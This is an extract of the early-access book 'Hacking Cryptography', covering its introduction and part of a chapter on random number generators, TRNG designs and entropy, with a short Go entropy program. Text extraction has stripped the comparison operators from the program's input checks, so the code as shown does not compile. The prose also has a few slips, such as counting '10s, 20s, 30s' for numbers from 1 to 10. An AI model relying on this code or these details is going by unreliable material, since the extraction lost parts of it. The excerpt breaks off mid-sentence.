Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023

Download as pdf or txt
Download as pdf or txt
You are on page 1of 94

MEAP Edition

Manning Early Access Program


Hacking Cryptography
Write, break, and fix real-world solutions
Version 4

Copyright 2023 Manning Publications

For more information on this and other Manning titles go to


manning.com
welcome
Thank you for purchasing the MEAP edition of Hacking Cryptography.

Cryptography has recently been thrust into the limelight thanks to crypto currencies, but it
has been around for far longer than that. It protects everything we do in the digital world and
is the last and most reliable line of defense for our data. Despite its significance and success,
cryptography is anything but infallible. While the theoretical foundations of this field of
knowledge are pretty sturdy, the practical applications seem almost doomed to eventually run
afoul of one implementation mistake or another.

A good understanding of how physical locks work can be obtained by learning how to pick
locks. That’s essentially what this book is about. While there are many books that explain how
cryptography is implemented (akin to how locks are made), this book builds an understanding
of cryptography by looking at how cryptographic locks are usually picked.

We hope that this book will expand the general understanding & discourse surrounding
cryptographic engineering. We look forward to hearing your thoughts on things that can be
improved. The MEAP is somewhat of a unique thing in the publishing industry and your feedback
is exactly the proverbial gold that it is trying to mine. It is an exciting prospect to be able to
improve your book based on actual reader feedback while you’re still writing it, and we heartily
appreciate the opportunity for doing so.

Please be sure to post any questions, comments, or suggestions you have about the book in
the liveBook discussion forum.

Thank you,
—Kamran Khan & Bill Cox
brief contents
1 Introduction
2 Random number generators
3 Implementing and exploiting RNGs
4 Stream ciphers
5 Block ciphers
6 Hash functions
7 Public key cryptography
8 Digital signatures
9 Common pitfalls for crypto implementations
This chapter covers
What is cryptography and why is it important?
Where and how is cryptography used?
How is this book going to cover cryptography?
1
Introduction

How will our approach differ from other books


that already cover this field?

Getting cryptography right is paramount for ensuring digital security in the modern world.
The mathematical ideas and theory behind cryptography are quite hard to break, while the
implementations (transforming mathematical ideas to reality via engineering processes, e.g.,
programming code and designing hardware) have orders of magnitude more vulnerabil-
ities that are much easier to exploit. For these reasons, malicious actors regularly target
flaws in implementations in order to “break” crypto. We wanted to capture these attacks
with an organized approach so that engineers working in information security can use this
book to build an elementary intuition for how cryptographic engineering usually falls prey
to adversaries.
In the upcoming chapters, we will dive into the technical details of how cryptography is
implemented and exploited, but before that let’s first go through a high-level view of what
cryptography is.
1.1 What is cryptography?
Cryptography is primarily the art of securing data by transforming or encoding it in a way
that makes it incomprehensible for everyone except the intended recipients.
Imagine an impenetrable safe that can only be opened with a unique key. You leave the
key with a relative and then travel across the country taking the safe box with you.
Now, when you need to send something secretly to this relative you put the items in the
safe and ship them using regular mail. The post office can see who the box is addressed
to (because they need to deliver it) but they (or anyone else, e.g., mailbox thieves) cannot
open the box to see the contents. Only the relative who has the specific key can retrieve
the contents once they receive the box.
Cryptography can be thought of as the digital equivalent of the safe box in the preceding
example. One of its primary uses is to protect the secrecy of digital messages while they
are transported around the world (by various internet service providers) in the form of
internet packets.
Protecting messages against eavesdroppers has historically been the main area of focus
for practitioners of cryptography. In the last half-century, however, cryptographic tools
are also used to ensure integrity & authenticity of data. Going back to the example of the
shipping boxes this would be akin to providing some incontrovertible proof that nobody
tampered with the box while it was en route.
Cryptography is the cornerstone of computer and network security in today’s world
and is by far the best tool for the job if you want to protect data against (both malicious
and accidental) exposure and/or corruption.
Data itself has grown exponentially in importance as governments, businesses and con-
sumers imbue it with meaning and significance; to the point where it is often referred to
as the “gold of the 21st century”. At its core, the main ingredients that drive the digital
revolution are:

Consumption of data (e.g., via input devices)


Processing of data (e.g., via processors)
Transmission of data (e.g., via network devices)
Storage of data (e.g., on hard drives)
Output of data (e.g., via monitors)

Whether we are watching video streams, doing online banking, or working from home
via video calls or playing video games; data drives our digital lives – and by extension, our
physical ones as well.
The infrastructure that deals with these truly gargantuan amounts of data is almost
always shared. For example, when we open a bank account we do not get a banking kiosk
installed in our homes with a dedicated physical wire to the bank’s mainframes. We instead
use the internet to access the bank’s servers and our digital traffic shares the physical path
with many other businesses and customers along the way.
Sharing the infrastructure, however, implies that the data is exposed to parties other
than the ones it was intended for. Not only could others look at this data, but they can
also actively modify or corrupt it for nefarious gains. Cryptography guards data against
these scenarios; e.g., ensuring that our Internet service providers cannot see our emails
or someone who has access to our Wi-Fi (possibly in a public place) cannot modify our
transactions when we are making online payments.

The Enigma encryption machine


Enigma was a famous encryption machine used by the Germans during World War II
for encoding secret military messages. Alan Turing and other researchers cracked the
encryption scheme which allowed them to decode these messages quickly. Breaking
the Enigma cipher was one of the most important victories by the Allied powers and
significantly tilted the balance of power during the war.

Other areas such as military applications rely even more heavily on the secrecy and in-
tegrity of data. Breaking the encryption used by the Enigma machine proved to be a piv-
otal advantage for allies in World War II. It would not be an overstatement to say that
while secrecy and confidentiality of messages have always been important, providing these
properties at scale has become a crucial aspect of modern society. Those who could do it
well gained distinct competitive advantages and those who lagged (whether it was nations
or corporations) paid the price dearly with the loss of consumer confidence, revenues, po-
litical influence; and even strategic setbacks in full-scale wars.
Cryptography is used to accomplish the following goals:
Confidentiality: Protect data so that only the intended parties can see it. For example,
the data on your laptop’s hard drive should remain inaccessible to an attacker who
steals it.
Integrity: Protect data so that it is not modified or corrupted while it is being shared
between legitimate parties.
Authenticity: Ensure that an entity is who they claim to be. For example, if you are
communicating with an old schoolmate over a messaging app we want to make sure
that it is indeed them at the other end and not some malicious code or employee
masquerading as your friend.

1.2 How does cryptography work?


1.2.1 Confidentiality
Confidentiality guards data against being seen by unwanted entities. It accomplishes this
by depending on “keys” which are available to all the intended participants but not any
eavesdroppers. In its simplest forms, a secret key is used to encrypt data as shown in figure
1.1. The same key is used to decrypt the data back. This is also known as “symmetric key”
encryption as the same key is used to both encrypt & decrypt data. The eavesdropper only
sees encrypted data which should be indistinguishable from random garbage bytes.
Figure 1.1 Usage of “symmetric” keys for encryption and decryption

It is important to note that the data should remain protected even if an attacker knows
every detail about the encryption algorithm except for the secret key itself. This is known
as “Kerckhoff’s principle”. A system violates this principle when its security hinges upon
whether or not its implementation details (e.g., the algorithm, the source code, and design
documents) are known to adversaries. Unfortunately, this principle is overlooked far too
often in real-world engineering decisions; mostly as a result of time constraints (publicly
auditing implementations and leveraging trained eyeballs takes time and resources) and
sometimes as an artifact of human psychology (it’s no fun to have your work attacked if
it’s important to do so).

Kerckhoff’s principle
A cryptosystem should be secure even if an attacker knows everything about the sys-
tem except for the key.

1.2.2 Integrity
While confidentiality protects data against being seen, integrity protects data against being
modified or corrupted. Figure 1.2 shows the usage of a key to “sign” the data, essentially
generating a strong pairing between the data and the signature. The data can then be sent
to a trusted party – who also has the secret key – along with the signature without any
fear of it being modified along the way (e.g., by an Internet Service Provider). Since any
attacker attempting to corrupt the data would not have the secret key they would not be
able to generate a valid signature. Once the data reaches its intended destination the trusted
party can use its copy of the secret key to verify the signature. Therefore, while data is
transmitted in plain sight, it is guarded against modification by ensuring integrity.

1.2.3 Authenticity
Authenticity is a special case of integrity. Integrity helps prove that a particular piece of
data was not modified. Authenticity builds upon that assertion to conclude that such data
was in control of a particular entity at some point. For example, imagine a website that does
not want its users to provide a username and password each time they visit. To improve
Figure 1.2 Usage of “symmetric” signing for ensuring integrity

the user experience the website generates a “token” upon successful login (i.e., a piece
of data signifying that the user provided the correct username and password) and signs
it with a secret key. The signed token is then downloaded on the user machine and for
subsequent visits, it is automatically provided to the website, which uses its secret key to
verify the integrity of the token. If the token signature is valid, the website can assume that
it issued the token itself at some prior point and building on that assumption it can trust
the username specified in the token. In other words, the website has authenticated the user
by their possession of a cryptographic token.
We can find some very rough analogies for applications of confidentiality, integrity and
authenticity around us. If a super-unforgeable stamp is made that can be verified by a
recipient, it could be used to stamp an envelope’s seal. The envelope is providing con-
fidentiality against eavesdroppers. The stamp is providing integrity so that the recipient
can verify the stamp to trust the contents of the envelope. Let’s say that the envelope
contained a local newspaper from some remote town. You could then naturally conclude
that whoever possessed the stamp was in that particular town on a particular day. The last
conclusion admittedly requires a leap of faith (e.g., maybe the stamp was lost or stolen,
maybe the newspaper was mailed and then stamped in a different town) but you can still
base a reasonable assumption of authenticity based on the integrity of the envelope. Simi-
larly, the formula for Coca-Cola is confidential. The caps on the bottles help us consumers
verify the integrity of the container and based on the results of our integrity check (and
the time/location of our purchase) we decide that the contents of the bottle are indeed
what they say on the label, i.e., they are authenticated by the Coca-Cola company and the
appropriate regulatory food authorities.

1.3 Attacks on cryptographic theory versus attacks on implementations


Cryptography is not new, at its core, it is driven by mathematical ideas that are sometimes
hundreds of years old. There are dozens of books with excellent coverage of cryptographic
theory and examples of how to implement that theory in academic settings.
However, most of the existing material advises against writing your own cryptography
for real-world applications. There are good reasons for that; cryptographic implementa-
tions are extremely hard to get “right”. Code that looks safe and secure ends up being
broken all the time. Bugs and programming defects manifest themselves in cryptographic
code in subtle ways and generate disastrous consequences if the code is relied upon for
protecting something critical.
If you are writing a JavaScript front-end application, a bug might produce a bad user
experience. If you are writing a machine-learning model for music recommendations ob-
scure bugs might generate wonky suggestions. Both the stakes and engineering require-
ments for precision are different for the world of cryptography, where the most advanced
adversaries will be attacking implementations via extremely sophisticated means and subtle
bugs can have huge ramifications for the security of a system. For example, a cryptographic
key might be broken just by analyzing the power consumption of the device where com-
putation is happening. It takes a truly unparalleled amount of vigilance and care to write
cryptographic code that can stand the test of time.
One example of a cryptographic implementation bug bringing down the system’s secu-
rity is Sony’s PlayStation 3; the gaming console remained secure for almost half a decade
until it was discovered that some of the random numbers were not being generated prop-
erly as part of some cryptographic operations. That simple mistake allowed Sony’s critical
private key – which was not even present on consumer hardware and was never meant to
leave Sony’s secure data centers – to be calculated and published by hackers.
Therefore, all the cryptography books advise against relying on your own cryptographic
implementations. In fact, this book is going to do the same! The difference, however, is
that this book covers how cryptography is implemented in the real world and how it has
been broken time and again. These ideas and practices are interspersed throughout presen-
tations, blog posts, research papers, specialized documents and vulnerability reports. This
book aims to capture the intricacies, pitfalls and hard-learned lessons from these resources
and present them in an organized manner in book form.
Most cryptographic code is broken via vulnerabilities in their implementation as opposed
to weaknesses in their mathematical theory. Many of the world’s brightest minds attack
the mathematical theory relentlessly before it is adopted as a standard. For example, one
of the most commonly used algorithms is Advanced Encryption Standard (AES) which
was adopted at the turn of the millennium after a three-year-long selection process where
many top cryptographers analyzed and debated more than a dozen candidates before se-
lecting the Rijndael algorithm as the winner. AES continues to be used extensively for
protecting everything from bank transactions to top-secret classified data. There are still
no known practical attacks against correctly-implemented AES. (“Practical” here implies
that contemporary adversaries would be able to leverage such an attack using a reasonable
amount of time and resources.)
On the other hand, systems employing AES have been broken time after time due
to weaknesses introduced by implementation bugs. For example, there have been many
practical attacks utilizing a class of bugs in how messages are “padded” (filled with empty
data for engineering reasons) that allow hackers to see data encrypted by vulnerable AES
implementations.
The implementations need to be updated much more frequently and even the most
accomplished engineers cannot foresee all the ways the code will interact with machines
and data. Due to these factors, it is more cost-effective for sophisticated adversaries to
target security gaps in implementation instead of attacking the theory itself. Therefore, we
will focus on how the engineering aspect of cryptography is usually broken, as opposed to
mathematical attacks on the theory itself.

1.4 What will you learn in this book?


This book will teach you how popular cryptographic algorithms are implemented in prac-
tice and how they are usually broken. The reader can use this information as an introduc-
tion to cryptography but we are not going to cover the underlying theory behind those
algorithms.
We will be using the Go programming language for most of the coding examples in this
book 1 . Go is a simple language that is well-suited for rapid prototyping and teaching engi-
neering concepts. Code listings and exercise solutions are available publicly at the GitHub
repository at https://github.com/krkhan/crypto-impl-exploit.
There are good reasons for why most people should not implement their own cryp-
tography in production code (i.e., code that business outcomes rely on). As we saw in the
preceding section, cryptographic implementations are extremely hard to get right. There-
fore, when choosing how to leverage cryptography the better engineering decision is to
rely on existing implementations that are widely used and thoroughly tested. For exam-
ple, OpenSSL is a popular cryptographic engine that has had its fair share of bugs over the
years but is a safe choice because of the large number of huge enterprises and governments
that rely on it for security. It is in the combined vested interests of all those entities that
bugs in OpenSSL be discovered and fixed as soon as possible.
The general principle in security engineering is to hedge your bets with the broader
community and big players. For example, instead of writing your own cryptographic pro-
tocol (and associated code) for message encryption you should rely on TLS (Transport
Layer Security) and specifically on versions and algorithms of TLS recommended for a
good security posture.
Therefore, for most businesses and organizations the recommended security design
involves following the best engineering practices and using existing cryptographic solutions
the right way, which in itself is a significant challenge on its own (e.g., you can certainly end
up using the right cryptographic fundamentals while overlooking some weaknesses caused
by complexities of their interactions).
Building an intuition for how security designs are weakened by flaws in cryptographic
implementations is not straightforward. This book aims to help the reader start grokking
the general attack principles and some common scenarios in which those principles are
applied. This understanding can help you in a few different areas. E.g.,

1 Tutorial: Get started with Go https://go.dev/doc/tutorial/getting-started


If you are going to be working on implementing cryptography, possibly at one of the
large enterprises, how to avoid common pitfalls.
How to perform code reviews and assess the security posture of existing implementa-
tions.
When security vulnerabilities get discovered and published about existing crypto-
graphic software, how to assess the implications and reason about those bugs in a
substantive manner.
If you do need to implement cryptography for something that isn’t widely used as
of yet, e.g., cryptographic elections or leverage cryptography for improving privacy
in machine learning algorithms, how to follow the best practices for writing secure
code.

None of this will preempt the need for getting your code reviewed by as many experts
as possible. You cannot point to any cryptographic implementation and claim that it is
secure. The best you can do is to have as many people try to break it as possible and then
fix the bugs as fast as possible to build confidence in the codebase. Linus Torvalds (the
creator of the Linux operating system) once famously quipped, "given enough eyeballs, all
bugs are shallow". For cryptographic code that is both a curse and a blessing. When bugs are
found in cryptographic code they produce vulnerabilities. On the other hand, when you
have enough eyeballs you approach the tail-end of remaining bugs as they become harder
to find and the code in question becomes reasonably safe. This book aims to assist in the
training of those eyeballs.

DO NOT implement your own cryptography


It is okay to use the contents of this book to learn about how cryptography works
and how it is usually broken. It is also okay to go further and read about more crypto
vulnerabilities and discuss them. In fact, it is even okay to try and break something new.
But please do not try to implement your own cryptographic code based on anything you
read here. If there is one takeaway from this book it’s this: it requires extreme discipline,
precision, knowledge, expertise and professional training to write secure cryptographic
code. This book only aims to organize the available knowledge in specific areas and
does not compensate for the rest of those qualities. A close analogy would be the
books on surgery, which do serve to organize that body of knowledge but no one in
their right mind would feel that reading some medical text equips them to be a surgeon
on their own.

1.5 Summary
Cryptography is the art of protecting the confidentiality and integrity of data. It con-
sists of mathematical theory and software (code) or hardware (dedicated chips) im-
plementations that leverage those mathematical ideas.
Cryptographic algorithms (i.e., the mathematical theory) are developed and adapted
after careful consideration and debate by top experts in the field.
Most cryptographic code is broken via attacks on its engineering implementation as
opposed to weaknesses in its mathematical theory.
Data is all around us, and permeates through shared infrastructure where it is paramount
to ensure its secrecy and safety.
When leveraging cryptography for security a good engineering approach is to use
well-established implementations.
Complex interactions between (even well-established) cryptographic components
can end up causing subtle weaknesses.
Readers of academic material on cryptography are well-advised against writing their
own cryptography because of the risk of subtle bugs that can compromise the security
of the whole system.
For cryptographic code that does have good reasons for being written from scratch, it
is valuable to crowdsource the review process and get the code reviewed by as many
experts as possible.
Random number generators

This chapter covers


The importance of random numbers for cryptog-
raphy
Quality of random number generators (uniform
2
distribution & entropy of RNGs)
Different types of random number generators
(cryptographically secure versus pseudo-random
number generators)
Example: Implement and exploit linear-congruential
generators (LCGs)

In this chapter, we lay the foundations for understanding what random numbers are and
what are some different kinds of random number generators. We shall implement and
exploit an insecure but quite widely used type of RNG known as linear-congruential gen-
erators (LCG). LCGs are not meant to be used for security-sensitive applications but will
help us get into the habit of implementing and exploiting algorithms. (In the next we shall
implement and exploit a cryptographically secure RNG.)
My first encounter with randomness was when I used the RAND button on my father’s
scientific calculator. Whenever I would press it I would get a seemingly different number.
This confused me endlessly. As a kid, you have some intuition about the limits of the
world around you. For example, you know that while folks inside the TV represent real
people, you cannot physically go inside the box. I understood that human beings have
created machines that could do 2+2 for us and give us answers. But the machine was under
our control. How could human beings ask a machine to decide something apparently all
on its own? Did that mean that the machines were thinking for themselves? I was too
young to comprehend the differences between determinism and randomness but as I grew
up learning about random number generators helped me wrap my head around how the
calculator was working. 1
Let’s begin by taking a deeper look at what random means. Imagine a magician asking
you, “Think of a random number between 1 and 10”. Most of us understand at an intuitive
level what that means. The magician is asking us to think of a number that they supposedly
cannot guess or predict.
Essentially the magician is asking you to generate a random number. We could therefore
visualize random number generators as something that produces an arbitrary sequence of
random numbers.

Figure 2.1 RNGs generate random numbers that are hard to predict

You would think that we would be pretty good at such a rudimentary task but as it
turns out human beings are lousy RNGs. Ideally, if you ask an RNG to generate one thou-
sand numbers between 1 and 10 you would get roughly a hundred 10s, a hundred 20s,
a hundred 30s and so on. In other words, the distribution of generated numbers would
be uniform. On the other hand, if you ask one thousand people to think of a number be-
tween 1 and 10 (or the same person a thousand times, although it is advised against for
reasons unrelated to random numbers or cryptography) you are likely to get many more
3s and 7s than 1s and 10s. This might seem inconsequential but the same problem plays
out at a larger scale where many people end up picking the same password under similar
constraints.

2.1 Why do we need random numbers for cryptography?


Random numbers are oxygen to the world of cryptography. The success of cryptography’s
primary goals (confidentiality, integrity & availability) depends crucially on the “quality”
of random numbers.
When asked to think of a number between 1 and 10 you are essentially picking from a list
of available choices. The same principle applies to, for example, cryptographic tools “gen-
erating” new keys by selecting them from a list of possible choices. If the keys they pick are
not uniformly distributed it could lead to attackers guessing the keys and bypassing any se-
curity provided by the underlying algorithms. Even slight biases could produce disastrous
1 David Wong had a similar experience when he was young. He talks about it in the chapter on Randomness in
his excellent book Real World Cryptography.
consequences. Let’s take a look at an example that is not directly related to cryptography
but outlines the basic idea of how biases in distribution make guessing easier.

2.1.1 Uniform distribution: Making things harder to guess


Imagine a medical portal that asks users to pick an 8-digit pin as their password. Passwords
would therefore look like 91838472 and 64829417.
Let’s say you are trying to brute-force a single password for a user account on this
website. The very first guess you would make would be choosing from a list of around
100 million possible passwords (from 1 to 99999999). If we put aside our species’ dismal
performance as RNGs aside for a moment and assume that the passwords are uniformly
distributed, you would need to make around 50 million attempts on average before hitting
the right password for a user’s account.
Now suppose that the medical portal sets the password as users’ birthdays expressed in
the form MMDDYYYY where the first two digits represent the month, the middle two represent
the day and the last four represent the year for a particular user’s birthday (quite a few
medical websites do this, unfortunately). How many guesses would you need to make now
before getting lucky? There are 12 possible values for MM, and 31 possible values for DD
and we can try the last 150 years (as the upper cap on the lifespan of a reasonable person)
for YYYY. The number of possible passwords is now shown in the equation 2.1.

|MM| × |DD| × |YYYY|


(2.1)
12 × 31 × 150 = 55800

Instead of 100 million possible passwords, the number has now been reduced to 55800.
In fact, we would on average need to make only around 28 thousand guesses before finding
the right password – a number much smaller than 50 million! The passwords are still 8-
digits in length like before, e.g., November 24, 1988 would be represented as the eight-
digit number 11241988; but the range of possible passwords has been reduced drastically
making the job of an attacker way easier than before.
When a cryptographic key is picked, any bias in the RNG where it strays from uniform
distribution could make the job of guessing keys easier for the attackers. There are many
other uses for random numbers in the area of cryptography. For example, your passwords
are mixed with random numbers before some computations are performed on them to
make them secure. (We will discuss the exact nature of those computations in our chap-
ter on hashing.) In cryptographically-verifiable elections, votes are mixed with random
numbers to ensure that votes to the same candidate do not end up producing the same
encrypted data.
We, therefore, conclude that for cryptographic needs, an RNG such as the one shown
in figure 2.1 should produce output (the lone arrow in the picture) that is uniformly dis-
tributed across the entire range of possible outputs.
2.1.2 Entropy: Quantifying unpredictability
Another important characteristic of the RNGs is entropy, which can be defined as the mea-
sure of uncertainty (or disorder – in terms of its classical definition) in a system. In a fair
coin toss where both sides have equal chances of landing up the entropy is 1 bit. If we
denote heads by 1 and tails by 0, we are equally unsure about whether the value of that
single bit will be heads or tails. If we were to predict the outcome of 10 successive fair coin
tosses we would have an entropy of 10 bits.
If the coin had been tampered with in some way the entropy would be less than 1 bit.
In fact the more biased it is the lesser the entropy would be. An extreme example would
be that if you have tails on both sides of the coin the entropy would be 0 bits. If the coin
has been tampered with so that heads has a 75% probability of coming up and tails only
25%, the entropy of such a coin toss would only be roughly 0.8 bits. Let’s see how.
The entropy of a probability distribution (e.g., distribution of numbers generated by an
RNG) can be calculated as shown in the equation 2.2.


H (X) = − px log2 px
x∈X (2.2)
= −p1 × log2 (p1 ) − p2 × log2 (p2 ) − ...pn × log2 (pn )

p1 is the probability of the first choice being picked up, p2 is the probability of the second
choice being picked up and so on. Each probability is multiplied by its binary log (log to the
base 2) before their negative sums are added up. In terms of a coin toss, we only have pheads
and ptails . The sum of all probabilities for a given probability space is 1. In other words,
while there’s a 50% (0.5) chance of either side coming up each time you flip the coin there
is a 100% chance that the answer will be one of those two options. Each probability value is
always less than 1 which makes its logarithm negative, so that we calculate a negative sum
to produce a positive value for the entropy.
We can write a program to calculate the entropy of a biased coin toss. It will help us get
in the flow for upcoming code examples as well. In listing 2.1 we are going to:
Take two floating point numbers as input, respectively representing the probability
of heads or tails coming out on top.
When parsing the input, we want the sum of the two numbers to be equal to 1 (and
also not to exceed it). Because of the way floating point numbers work in Go, if we
simply compare (heads+tails) to 1 for equality it would trip for some inputs, e.g.,
0.9 and 0.1 (even though their sum should be equal to 1). For this reason on line 34
we measure how close we are to approaching 1 instead of testing for equality.
Apply the formula in equation 2.2 to these values and output the result.
These steps are shown in the flowchart in figure 2.2.
Figure 2.2 Flow chart for calculating the entropy of a biased coin toss
Listing 2.1 ch02/biased_coin_toss/main.go

1 package main
2
3 import (
4 ”fmt”
5 ”math”
6 ”os”
7 ”strconv”
8 )
9
10 func main() {
11 var line string
12
13 fmt.Printf(”Enter probability of heads (between 0.0 and 1.0): ”)
14 fmt.Scanln(&line)
15 heads, err := strconv.ParseFloat(line, 32)
16 if err != nil || heads 0 || heads 1 {
17 fmt.Println(”Invalid probability value for heads”)
18 os.Exit(1)
19 }
20
21 fmt.Printf(”Enter probability of tails (between 0.0 and 1.0): ”)
22 fmt.Scanln(&line)
23 tails, err := strconv.ParseFloat(line, 2)
24 if err != nil || tails 0 || tails 1 {
25 fmt.Println(”Invalid probability value for heads”)
26 os.Exit(1)
27 }
28
29 if heads+tails > 1 {
30 fmt.Println(”Sum of P(heads) and P(tails) must be less than 1”)
31 os.Exit(1)
32 }
33
This measures the delta (how far the value is)
34 if 1-(heads+tails) > 0.01 { of (heads+tails) from 1
35 fmt.Println(”Sum of P(heads) and P(tails) must be 1”)
36 os.Exit(1)
37 }
38
39 entropy := -(heads * math.Log2(heads)) - (tails * math.Log2(tails))
40 fmt.Printf(”P(heads)=%.2f, P(tails)=%.2f, Entropy: %.2f bits\n”, heads,
tails, entropy)
41 }

Let’s run this program for a few inputs as shown in listing 2.2.

Listing 2.2 Output for ch02/biased_coin_toss/main.go

P(heads)=0.50, P(tails)=0.50, Entropy: 1.00 bits


P(heads)=0.75, P(tails)=0.25, Entropy: 0.81 bits
P(heads)=0.80, P(tails)=0.20, Entropy: 0.72 bits
P(heads)=0.10, P(tails)=0.90, Entropy: 0.47 bits

As you can see, even though we are still getting one bit of output (i.e., whether the result
was heads or tails) when we do toss the coin, the entropy of output decreases as the coin
toss becomes more biased. Another way to understand this is to look at it from the other
side, i.e., if a coin toss has an entropy of 1 bit, guessing its output becomes as hard as it can
be for a coin toss. If it has an entropy of 0.47 bits we know one outcome is likelier than
the other so guessing it becomes relatively easier.

Figure 2.3 Entropy of a biased coin toss

Figure 2.3 shows how entropy (the solid curved line) changes as the coin toss becomes
more biased. The dotted lines represent the probabilities of heads or tails coming up.
Please note that their sum always remains exactly equal to 1 because they represent the
entire probability space, i.e., there is no third outcome. Entropy is maximum (the peak in
the middle) when both heads and tails have a 50% probability of occurring. That is when
it is the hardest to predict which way the coin is likelier to land.
So how is entropy related to RNGs? If the output of an RNG is uniformly distributed,
the job of guessing the output is as hard as it could be. We have maximum possible uncer-
tainty about the output and entropy is the measure of uncertainty.

The relation between output distribution and entropy of an RNG


A random number generator has maximum entropy when its output distribution is
uniform.

2.2 Understanding different types of RNGs


Now that we have a basic understanding of what RNGs do (they generate random num-
bers), and how we evaluate their quality (i.e., how close their output is to a uniform distri-
bution, which would help by maximizing the entropy of the output bits), let’s see what are
some different types of RNGs and how they differ from each other.
RNGs can be broadly categorized into:
True Random Number Generators (TRNGs) rely on non-deterministic physical
phenomena (e.g., quantum unpredictability) to generate random numbers.
Pseudo Random Number Generators (PRNGs) use a deterministic algorithm (usu-
ally implemented in software) to generate random numbers.
Cryptographically Secure Pseudo Random Number Generators (CSPRNGs) are
PRNGs that satisfy extra requirements needed for cryptographic security.

2.2.1 True Random Number Generators (TRNGs)


Coin toss, dice roll, nuclear decay, thermal noise from a resistor, and even the weather 2
are examples of phenomena that generate unpredictable values that can be used as sources
of randomness – with varying levels of quality (entropy) and performance (how fast can
they produce new numbers). Performance is an important characteristic that measures
how fast can an RNG produce new numbers. For example, you could decide whether to
use an umbrella based on the random physical phenomenon of rain but that decision will
not change every millisecond. The rate of generation for the randomness is bound by what
you are sampling (is it raining?), and how often the underlying physical conditions change
(it would take at least a few minutes for the rain to start or stop).

Figure 2.4 TRNGs sample physical phenomena to generate random numbers

In general, we want TRNGs to satisfy the following properties:


They should protect (e.g., by tamper-proofing) against attackers that have physical
control over the TRNG and want to either predict or influence its output.
They should provide a physical model that predicts the rate-of-generation and en-
tropy of generated bits based on the fundamental physical properties of the under-
lying phenomena. These “health checks” should preferably shut down the TRNG if
its operation is deemed to be faulty. Please note that while the model should help in
2 Random weather. https://quantumbase.com/random-weather/
quantifying the operational characteristics of the RNG (i.e., rate of generation and
entropy of generated bits) they do not predict the actual bits. They essentially assess
the questions “Are you generating random enough bits?” and “are you generating
random bits fast enough”; but they do not predict the actual bits coming out of the
RNG.

TRNGs sample physical world to generate values that are practically unpredictable.
(There could be a philosophical argument that we are living in a deterministic universe
and nothing is truly “unpredictable”, but it is not relevant for cryptographic discussions.
We only need the values to be un-guessable by contemporary adversaries on earth.) This
is shown in figure 2.4. Some of these phenomena include:

TRNGs sample physical phenomena to generate random numbers


These generate “true” random numbers in the truest sense of the word as nuclear
decay is a random process at the level of single atoms (leading Albert Einstein to
famously proclaim “God does not play dice”, which is exactly what we want to play.).
It is impossible to predict when a particular atom will decay but if you group several
identical atoms the overall decay rate can be expressed as half-life; which is defined
as the time required for exactly half the atoms to decay on average. The probabilistic
process of decay can be sampled by a Geiger counter to generate digital bits. The
reason this method is not widely used everywhere is that it is expensive in terms of
reliable detection itself as well as requiring radioactive sources that would satisfy the
desired parameters (e.g., rate of generation).
Atmospheric noise detected by radio receivers.
These are cheap to build but are susceptible to physical attacks where an adversary
can easily influence the output of the RNG via electromagnetic interference.
Measuring variance/drift in the timing of clock signals.
This method is cheap. Clock signals are already the backbone of almost every modern
processor so it does not require new hardware but it does a great deal of care for
getting the implementation right. Measuring clock drifts is not trivial, they were not
designed for generating random numbers; and the behavior is easily influenced by
adversaries with either physical (e.g., being able to induce power-supply noise) or
remote access to the processor (e.g., being able to execute other applications on the
same processor).
Electric noise generated by the avalanche or Zener effect.
Diodes are components used in electric circuits to protect other components by let-
ting the current flow in only one direction. Certain diodes have some interesting
physical properties where they can generate noise that can be leveraged by an RNG.
We will look into these in more detail in the next section.
Ring oscillators.
This method is similar to the clock-drift technique in the sense that it also relies on
the jitter present in clock signals. However, instead of measuring the jitter directly,
it places an odd number of NOT gates that are connected in a ring so that the final
output keeps oscillating between two voltage levels.
Modular entropy multiplication (MEM).
This is a relatively new method invented by Peter Allan in the late 1990s and in-
dependently by Bill Cox (co-author of this book) in the 2010s. MEM works with
an analog source of noise (which could be via one of the methods listed above). It
amplifies this noise and then dramatically keeps fluctuating the voltage based on a
set of very simple rules. This method is low-cost, protects against electromagnetic
interference and provides a physical model to assess the health of the RNG.
Avalanche effect and ring oscillators have found widespread application in the industry
as RNGs so we are going to dive deeper and discuss the implications and pitfalls of their
usage. We will then discuss MEM and how it protects against certain attacks that target
other electric noise-based RNGs.
TRNGS BASED ON AVALANCHE OR ZENER DIODES
Diodes are electronic components used to restrict the flow of current in only one direc-
tion. For example, they can be used to protect an electric circuit if the power supply input
polarity is reversed. The electric symbol for diodes is shown in figure 2.5.

Figure 2.5 Diodes help ensure the flow of current in a single direction.

When the voltage is applied to the diode such that the current can flow in its natural di-
rection it is called to be “forward-biased”. When the voltage is reversed the diode (ideally)
stops conducting and is said to be “reverse-biased”.
The fact that the current does not usually flow when a diode is reverse-biased is exactly
what makes them useful. There are however a few unintended properties associated with
certain types of diodes. These are called “parasitic” effects as they are, generally-speaking,
undesirable. Sometimes though even the parasitic effects can be useful, as is the case of
random-number generation and Avalanche or Zener effects, which are two distinct physi-
cal phenomena that generate noise in the electrical circuit. This noise can then be sampled
by amplifying it and running it through an analog-to-digital (ADC) converter.
Zener diodes make poor TRNGs despite their heavy usage for that purpose. There are
a few reasons why:
Zener diodes are carefully designed to reduce avalanche noise and make terrible
sources of electronic noise. Note that a very common use case for Zener diodes is
power supply regulation where noise is highly undesirable.
The parasitic Zener effect of a reverse-biased diode is not typically parameterized by
the manufacturer. The manufacturers prioritize quality control for the "proper" oper-
ation of Zener diodes as opposed to side effects when biased in the reverse direction.
The noise varies from device to device dramatically. Even worse, from manufacturer
to manufacturer variations can easily be > 10X in noise, and several volts’ difference
in breakdown voltage.
The noise from these Zener effects is fairly temperature sensitive and can change
over time as the circuit ages.
There is no physical model we can correlate well to Zener noise for assessing the
health of a TRNG.

TRNGS BASED ON RING OSCILLATORS


A NOT gate is used to logically invert its input. That is, if the input is high the output
is low and vice-versa. They are also known as inverters and are denoted symbolically by a
triangle with a small circle at the end. If you connect an odd number of inverters in a ring
their output will keep oscillating forever as shown in figure 2.6.

Figure 2.6 A ring oscillator

Typical ring oscillators have 5 or more inverters, but the number is always odd. Usually,
this oscillation is subject to thermal drift. That is, their operation (e.g., how long it takes
for the output level to fully change when input is inverted) varies in response to ambient
temperature. The underlying phenomenon providing unpredictability is the phase noise
in the electrical signal.
The ring oscillator TRNG designs have a few shortcomings and are responsible for
quite a few failures in cryptography. Here’s why:
As we saw in the guidelines at the beginning of the section, a physical model based
